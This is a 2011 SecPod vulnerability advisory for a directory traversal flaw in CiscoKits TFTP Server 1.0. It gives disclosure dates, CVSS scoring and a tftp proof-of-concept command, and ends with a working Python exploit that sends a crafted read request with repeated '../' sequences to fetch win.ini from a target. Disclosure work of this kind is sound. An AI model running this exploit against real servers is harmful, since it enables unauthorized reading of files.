############################################################################### CiscoKits TFTP Server Directory Traversal Vulnerability SecPod Technologies (www.secpod.com) Author: Antu Sanadi ############################################################################### SecPod ID: 1022 21/07/2011 Issue Discovered 03/08/2011 Vendor Notified Vendor Replied to Disclose 04/08/2011 Advisory Released Class: Information Disclosure Severity: Medium Overview: --------- Ciscokits TFTP Server Version 1.0 is prone to a Directory Traversal vulnerability. Technical Description: ---------------------- The vulnerability is caused due to improper validation to Read Request containing '../' sequences, which allows attackers to read arbitrary files via directory traversal attacks. Impact: -------- Successful exploitation could allow an attacker to obtain sensitive information, which may lead to launching further attacks. Affected Software: ------------------ Ciscokits TFTP Server Version 1.0 Tested on: ----------- Ciscokits TFTP Server Version 1.0 on Windows XP SP3. References: ----------- http://secpod.org/blog/?p=301 http://www.certificationkits.com http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt Proof of Concept: ---------------- tftp> get ../../../../../../../../../../../windows/win.ini Solution: ---------- Not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = LOW AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = PARTIAL INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT = NONE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) CVSS Temporal Score = 4.5 Risk factor = Medium Credits: -------- Antu Sanadi of SecPod Technologies has been credited with the discovery of this vulnerability. ==================================================== #!/usr/bin/python ############################################################################## # Title : CiscoKits TFTP Server Directory Traversal Vulnerability # Author : Antu Sanadi from SecPod Technologies (www.secpod.com) # Vendor : http://www.certificationkits.com/cisco-ccna-tftp-server/ # Advisory : http://secpod.org/blog/?p=301 # http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py # http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt # Version : CiscoKits CCNA TFTP Server 1.0.0.0 # Date : 21/07/2011 ############################################################################## import sys, socket def sendPacket(HOST, PORT, data): ''' Sends UDP Data to a Particular Host on a Specified Port with a Given Data and Return the Response ''' udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_sock.sendto(data, (HOST, PORT)) data = udp_sock.recv(1024) udp_sock.close() return data if __name__ == "__main__": if len(sys.argv) < 2: print "\tUsage: python exploit.py target_ip" print "\tExample : python exploit.py 127.0.0.1" print "\tExiting..." sys.exit(0) HOST = sys.argv[1] ## The Server IP PORT = 69 ## Default TFTP port data = "\x00\x01" ## TFTP Read Request data += "../" * 10 + "windows/win.ini" + "\x00" ## Read win.ini file using directory traversal data += "netascii\x00" ## TFTP Type # netascii rec_data = sendPacket(HOST, PORT, data) print "Data Found on the target : %s " %(HOST) print rec_data.strip()